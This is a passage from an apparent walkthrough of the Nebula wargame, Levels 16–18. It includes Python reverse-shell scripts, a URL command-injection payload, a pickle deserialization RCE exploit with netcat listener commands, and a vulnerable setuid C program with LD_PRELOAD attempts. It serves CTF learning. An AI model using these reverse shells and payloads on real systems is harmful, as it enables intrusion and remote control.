<span class="kn">import</span> <span class="nn">socket</span><span class="o">,</span><span class="nn">subprocess</span><span class="o">,</span><span class="nn">os</span>
<span class="n">s</span><span class="o">=</span><span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span><span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">)</span>
<span class="n">s</span><span class="o">.</span><span class="n">connect</span><span class="p">((</span><span class="s2">"192.168.56.1"</span><span class="p">,</span><span class="mi">8888</span><span class="p">))</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">0</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">1</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">dup2</span><span class="p">(</span><span class="n">s</span><span class="o">.</span><span class="n">fileno</span><span class="p">(),</span><span class="mi">2</span><span class="p">)</span>
<span class="n">p</span><span class="o">=</span><span class="n">subprocess</span><span class="o">.</span><span class="n">call</span><span class="p">([</span><span class="s2">"/bin/sh"</span><span class="p">,</span><span class="s2">"-i"</span><span class="p">])</span>
<span class="n">level16</span><span class="nd">@nebula</span><span class="p">:</span><span class="o">~</span><span class="err">$</span> <span class="n">chmod</span> <span class="o">+</span><span class="n">x</span> <span class="o">/</span><span class="n">tmp</span><span class="o">/</span><span class="n">BD</span><span class="o">.</span><span class="n">PY</span>
</code></pre></div>
<p>And request the url with the payload:</p>
<blockquote>
<p>http://192.168.56.101:1616/index.cgi?username=%24%28%2F%2A%2FBD.PY%29&password=</p>
</blockquote>
<p>Getting us a shell:</p>
<div class="highlight"><pre><span></span><code>sh-4.2$ id
id
<span class="nv">uid</span><span class="o">=</span><span class="m">983</span><span class="o">(</span>flag16<span class="o">)</span> <span class="nv">gid</span><span class="o">=</span><span class="m">983</span><span class="o">(</span>flag16<span class="o">)</span> <span class="nv">groups</span><span class="o">=</span><span class="m">983</span><span class="o">(</span>flag16<span class="o">)</span>
sh-4.2$ getflag
getflag
You have successfully executed getflag on a target account
</code></pre></div>
<p>Another approach would be to use case modifications in shell expansions:
<a href="http://wiki.bash-hackers.org/syntax/pe#case_modification">case modifications</a></p>
<h2>Level 17 - RCE with pickle</h2>
<p>This level is quite similar to a previous level where we exploited <code>serialize()</code> in PHP.</p>
<p>Pickle is a simple object serialization algortihm that transforms Python objects to strings and vice versa.</p>
<p>But as the docs state, it is unsecure when the data comes from untrusted sources. In our case, the vulnerable server
looks like this:</p>
<div class="highlight"><pre><span></span><code><span class="ch">#!/usr/bin/python</span>
<span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">pickle</span>
<span class="kn">import</span> <span class="nn">time</span>
<span class="kn">import</span> <span class="nn">socket</span>
<span class="kn">import</span> <span class="nn">signal</span>
<span class="n">signal</span><span class="o">.</span><span class="n">signal</span><span class="p">(</span><span class="n">signal</span><span class="o">.</span><span class="n">SIGCHLD</span><span class="p">,</span> <span class="n">signal</span><span class="o">.</span><span class="n">SIG_IGN</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">server</span><span class="p">(</span><span class="n">skt</span><span class="p">):</span>
<span class="n">line</span> <span class="o">=</span> <span class="n">skt</span><span class="o">.</span><span class="n">recv</span><span class="p">(</span><span class="mi">1024</span><span class="p">)</span>
<span class="nb">print</span> <span class="s1">'Got line: "</span><span class="si">{}</span><span class="s1">"'</span><span class="o">.</span><span class="n">format</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="n">obj</span> <span class="o">=</span> <span class="n">pickle</span><span class="o">.</span><span class="n">loads</span><span class="p">(</span><span class="n">line</span><span class="p">)</span>
<span class="k">for</span> <span class="n">i</span> <span class="ow">in</span> <span class="n">obj</span><span class="p">:</span>
<span class="n">clnt</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="s2">"why did you send me "</span> <span class="o">+</span> <span class="n">i</span> <span class="o">+</span> <span class="s2">"?</span><span class="se">\n</span><span class="s2">"</span><span class="p">)</span>
<span class="n">skt</span> <span class="o">=</span> <span class="n">socket</span><span class="o">.</span><span class="n">socket</span><span class="p">(</span><span class="n">socket</span><span class="o">.</span><span class="n">AF_INET</span><span class="p">,</span> <span class="n">socket</span><span class="o">.</span><span class="n">SOCK_STREAM</span><span class="p">,</span> <span class="mi">0</span><span class="p">)</span>
<span class="n">skt</span><span class="o">.</span><span class="n">bind</span><span class="p">((</span><span class="s1">'0.0.0.0'</span><span class="p">,</span> <span class="mi">10007</span><span class="p">))</span>
<span class="n">skt</span><span class="o">.</span><span class="n">listen</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
<span class="k">while</span> <span class="kc">True</span><span class="p">:</span>
<span class="n">clnt</span><span class="p">,</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">skt</span><span class="o">.</span><span class="n">accept</span><span class="p">()</span>
<span class="k">if</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">fork</span><span class="p">()</span> <span class="o">==</span> <span class="mi">0</span><span class="p">):</span>
<span class="n">clnt</span><span class="o">.</span><span class="n">send</span><span class="p">(</span><span class="s2">"Accepted connection from </span><span class="si">%s</span><span class="s2">:</span><span class="si">%d</span><span class="s2">"</span> <span class="o">%</span> <span class="p">(</span><span class="n">addr</span><span class="p">[</span><span class="mi">0</span><span class="p">],</span> <span class="n">addr</span><span class="p">[</span><span class="mi">1</span><span class="p">]))</span>
<span class="n">server</span><span class="p">(</span><span class="n">clnt</span><span class="p">)</span>
<span class="n">exit</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span>
</code></pre></div>
<p>The above program spawns a server and loads pickled data from the client data. This is unsecure, because
we can craft a pickled string that executes commands.</p>
<p>You can obtain the pickled string by executing the following code:</p>
<div class="highlight"><pre><span></span><code><span class="kn">import</span> <span class="nn">os</span>
<span class="kn">import</span> <span class="nn">pickle</span>
<span class="c1"># Exploit that we want the target to unpickle</span>
<span class="k">class</span> <span class="nc">Exploit</span><span class="p">(</span><span class="nb">object</span><span class="p">):</span>
<span class="k">def</span> <span class="nf">__reduce__</span><span class="p">(</span><span class="bp">self</span><span class="p">):</span>
<span class="k">return</span> <span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">system</span><span class="p">,</span> <span class="p">(</span><span class="s1">'python /tmp/bd.py'</span><span class="p">,))</span>
<span class="n">shellcode</span> <span class="o">=</span> <span class="n">pickle</span><span class="o">.</span><span class="n">dumps</span><span class="p">(</span><span class="n">Exploit</span><span class="p">())</span>
<span class="nb">print</span> <span class="n">shellcode</span>
</code></pre></div>
<p>Then as always, create a connect back shell in <code>/tmp/bd.py</code> which might look like this (make it executable!):</p>
<div class="highlight"><pre><span></span><code>level17@nebula:/home/flag17$ cat /tmp/bd.py
<span class="c1">#!/usr/bin/python</span>
import socket,subprocess,os
<span class="nv">s</span><span class="o">=</span>socket.socket<span class="o">(</span>socket.AF_INET,socket.SOCK_STREAM<span class="o">)</span>
s.connect<span class="o">((</span><span class="s2">"localhost"</span>, <span class="m">8888</span><span class="o">))</span>
os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,0<span class="o">)</span>
os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,1<span class="o">)</span>
os.dup2<span class="o">(</span>s.fileno<span class="o">()</span>,2<span class="o">)</span>
<span class="nv">p</span><span class="o">=</span>subprocess.call<span class="o">([</span><span class="s2">"/bin/sh"</span>,<span class="s2">"-i"</span><span class="o">])</span>
</code></pre></div>
<p>First open one terminal and enter the following command:</p>
<div class="highlight"><pre><span></span><code>level17@nebula:~$ nc -l localhost <span class="m">8888</span>
</code></pre></div>
<p>And in the second terminal we exploit the server by entering the following in a terminal:</p>
<div class="highlight"><pre><span></span><code>evel17@nebula:/home/flag17$ nc localhost <span class="m">10007</span>
Accepted connection from <span class="m">127</span>.0.0.1:39122cposix
system
p0
<span class="o">(</span>S<span class="s1">'python /tmp/bd.py'</span>
p1
tp2
Rp3
.
</code></pre></div>
<p>And then in the first terminal we have a shell with user <code>flag17</code>. Done!</p>
<h2>Level 18 - Exhausting file descriptors to create circumstances</h2>
<p>In this level, we neet to exploit a C Program that has the setuid bit set. The program has the following code:</p>
<div class="highlight"><pre><span></span><code><span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdlib.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><unistd.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><string.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><sys/types.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><fcntl.h></span><span class="cp"></span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><getopt.h></span><span class="cp"></span>
<span class="k">struct</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">debugfile</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">verbose</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="kt">int</span><span class="w"> </span><span class="n">loggedin</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"> </span><span class="n">globals</span><span class="p">;</span><span class="w"></span>
<span class="cp">#define dprintf(...) if(globals.debugfile) \</span>
<span class="cp"> fprintf(globals.debugfile, __VA_ARGS__)</span>
<span class="cp">#define dvprintf(num, ...) if(globals.debugfile && globals.verbose >= num) \</span>
<span class="cp"> fprintf(globals.debugfile, __VA_ARGS__)</span>
<span class="cp">#define PWFILE "/home/flag18/password"</span>
<span class="kt">void</span><span class="w"> </span><span class="nf">login</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">pw</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="n">fp</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">fp</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="n">PWFILE</span><span class="p">,</span><span class="w"> </span><span class="s">"r"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fp</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">file</span><span class="p">[</span><span class="mi">64</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">fgets</span><span class="p">(</span><span class="n">file</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="o">-</span><span class="w"> </span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="n">fp</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"Unable to read password file %s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">PWFILE</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">fp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strcmp</span><span class="p">(</span><span class="n">pw</span><span class="p">,</span><span class="w"> </span><span class="n">file</span><span class="p">)</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="k">return</span><span class="p">;</span><span class="w"> </span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"logged in successfully (with%s password file)</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span>
<span class="w"> </span><span class="n">fp</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="w"> </span><span class="o">?</span><span class="w"> </span><span class="s">"out"</span><span class="w"> </span><span class="o">:</span><span class="w"> </span><span class="s">""</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">1</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">void</span><span class="w"> </span><span class="nf">notsupported</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">what</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">buffer</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">asprintf</span><span class="p">(</span><span class="o">&</span><span class="n">buffer</span><span class="p">,</span><span class="w"> </span><span class="s">"--> [%s] is unsupported at this current time.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">what</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="n">what</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">free</span><span class="p">(</span><span class="n">buffer</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">void</span><span class="w"> </span><span class="nf">setuser</span><span class="p">(</span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">user</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">msg</span><span class="p">[</span><span class="mi">128</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="n">sprintf</span><span class="p">(</span><span class="n">msg</span><span class="p">,</span><span class="w"> </span><span class="s">"unable to set user to '%s' -- not supported.</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">user</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">msg</span><span class="p">);</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
<span class="kt">int</span><span class="w"> </span><span class="nf">main</span><span class="p">(</span><span class="kt">int</span><span class="w"> </span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">**</span><span class="n">envp</span><span class="p">)</span><span class="w"></span>
<span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">c</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="p">((</span><span class="n">c</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">getopt</span><span class="p">(</span><span class="n">argc</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="s">"d:v"</span><span class="p">))</span><span class="w"> </span><span class="o">!=</span><span class="w"> </span><span class="mi">-1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">switch</span><span class="p">(</span><span class="n">c</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="sc">'d'</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fopen</span><span class="p">(</span><span class="n">optarg</span><span class="p">,</span><span class="w"> </span><span class="s">"w+"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"Unable to open %s"</span><span class="p">,</span><span class="w"> </span><span class="n">optarg</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">setvbuf</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="p">,</span><span class="w"> </span><span class="nb">NULL</span><span class="p">,</span><span class="w"> </span><span class="n">_IONBF</span><span class="p">,</span><span class="w"> </span><span class="mi">0</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">case</span><span class="w"> </span><span class="sc">'v'</span><span class="o">:</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">verbose</span><span class="o">++</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"Starting up. Verbose level = %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">verbose</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">setresgid</span><span class="p">(</span><span class="n">getegid</span><span class="p">(),</span><span class="w"> </span><span class="n">getegid</span><span class="p">(),</span><span class="w"> </span><span class="n">getegid</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="n">setresuid</span><span class="p">(</span><span class="n">geteuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">());</span><span class="w"></span>
<span class="w"> </span><span class="k">while</span><span class="p">(</span><span class="mi">1</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="n">line</span><span class="p">[</span><span class="mi">256</span><span class="p">];</span><span class="w"></span>
<span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">p</span><span class="p">,</span><span class="w"> </span><span class="o">*</span><span class="n">q</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">q</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">fgets</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="k">sizeof</span><span class="p">(</span><span class="n">line</span><span class="p">)</span><span class="mi">-1</span><span class="p">,</span><span class="w"> </span><span class="n">stdin</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">q</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="nb">NULL</span><span class="p">)</span><span class="w"> </span><span class="k">break</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">strchr</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="sc">'\n'</span><span class="p">);</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">p</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">strchr</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="sc">'\r'</span><span class="p">);</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">p</span><span class="p">)</span><span class="w"> </span><span class="o">*</span><span class="n">p</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="n">dvprintf</span><span class="p">(</span><span class="mi">2</span><span class="p">,</span><span class="w"> </span><span class="s">"got [%s] as input</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span><span class="w"> </span><span class="n">line</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"login"</span><span class="p">,</span><span class="w"> </span><span class="mi">5</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">dvprintf</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="w"> </span><span class="s">"attempting to login</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">login</span><span class="p">(</span><span class="n">line</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">6</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"logout"</span><span class="p">,</span><span class="w"> </span><span class="mi">6</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"shell"</span><span class="p">,</span><span class="w"> </span><span class="mi">5</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">dvprintf</span><span class="p">(</span><span class="mi">3</span><span class="p">,</span><span class="w"> </span><span class="s">"attempting to start shell</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">execve</span><span class="p">(</span><span class="s">"/bin/sh"</span><span class="p">,</span><span class="w"> </span><span class="n">argv</span><span class="p">,</span><span class="w"> </span><span class="n">envp</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">err</span><span class="p">(</span><span class="mi">1</span><span class="p">,</span><span class="w"> </span><span class="s">"unable to execve"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="n">dprintf</span><span class="p">(</span><span class="s">"Permission denied</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"logout"</span><span class="p">,</span><span class="w"> </span><span class="mi">4</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">loggedin</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"closelog"</span><span class="p">,</span><span class="w"> </span><span class="mi">8</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="p">)</span><span class="w"> </span><span class="n">fclose</span><span class="p">(</span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="n">globals</span><span class="p">.</span><span class="n">debugfile</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"site exec"</span><span class="p">,</span><span class="w"> </span><span class="mi">9</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">notsupported</span><span class="p">(</span><span class="n">line</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">10</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"> </span><span class="k">else</span><span class="w"> </span><span class="k">if</span><span class="p">(</span><span class="n">strncmp</span><span class="p">(</span><span class="n">line</span><span class="p">,</span><span class="w"> </span><span class="s">"setuser"</span><span class="p">,</span><span class="w"> </span><span class="mi">7</span><span class="p">)</span><span class="w"> </span><span class="o">==</span><span class="w"> </span><span class="mi">0</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">setuser</span><span class="p">(</span><span class="n">line</span><span class="w"> </span><span class="o">+</span><span class="w"> </span><span class="mi">8</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="p">}</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="mi">0</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<h4>Trying with gdb</h4>
<p>First I tried to debug the <code>./flag18</code> binary with <code>gdb</code> and overwrite the <code>globals.loggedin</code> global
such that it would spawn the shell upon entering <code>shell</code> to stdin. That did indeed work, but the shell
wasn't run with <code>flag18</code> privs, because gdb sets the uid/euid to the real user id instead of the effective user id.
This means that gdb drops by default set user id privs.</p>
<h4>Trying to use the LD_PRELOAD trick</h4>
<p>Then I tried to apply the LD_PRELOAD trick by overwriting <code>fopen()</code> to always return NULL, such that the <code>login()</code> function
would succed. I used the following code:</p>
<div class="highlight"><pre><span></span><code><span class="c1">// Compile with:</span>
<span class="c1">// gcc -Wall -fPIC -shared -o fopen.so fopen.c</span>
<span class="c1">// Then:</span>
<span class="c1">// LD_PRELOAD=fopen.so</span>
<span class="cp">#include</span><span class="w"> </span><span class="cpf"><stdio.h></span><span class="cp"></span>
<span class="kt">FILE</span><span class="w"> </span><span class="o">*</span><span class="nf">fopen</span><span class="p">(</span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">path</span><span class="p">,</span><span class="w"> </span><span class="k">const</span><span class="w"> </span><span class="kt">char</span><span class="w"> </span><span class="o">*</span><span class="n">mode</span><span class="p">)</span><span class="w"> </span><span class="p">{</span><span class="w"></span>
<span class="w"> </span><span class="n">printf</span><span class="p">(</span><span class="s">"Always failing fopen</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span><span class="w"></span>
<span class="w"> </span><span class="k">return</span><span class="w"> </span><span class="nb">NULL</span><span class="p">;</span><span class="w"></span>
<span class="p">}</span><span class="w"></span>
</code></pre></div>
<p>But this approach is also doomed to fail, because the LD_PRELOAD trick doesn't work with setuid binaries. The loader
will only load libraries that have also the setuid bit set and can be found in standard locations as <code>/usr/lib/</code> and the like.</p>
<blockquote>
<p>For set-user-ID/set-group-ID ELF binaries, only libraries in the standard
search directories that are also set-user-ID will be loaded.</p>
</blockquote>
<h4>Real, effective and the saved user id.</h4>
<p>After not having success upon quick examination, it's time to review some of the first lines
in the code:</p>
<div class="highlight"><pre><span></span><code><span class="n">setresgid</span><span class="p">(</span><span class="n">getegid</span><span class="p">(),</span><span class="w"> </span><span class="n">getegid</span><span class="p">(),</span><span class="w"> </span><span class="n">getegid</span><span class="p">());</span><span class="w"></span>
<span class="n">setresuid</span><span class="p">(</span><span class="n">geteuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">(),</span><span class="w"> </span><span class="n">geteuid</span><span class="p">());</span><span class="w"></span>
</code></pre></div>
<p>setresXid sets the real, effective and saved user/group id of the calling process. But what are these different
user identifiers for?</p>
<ul>
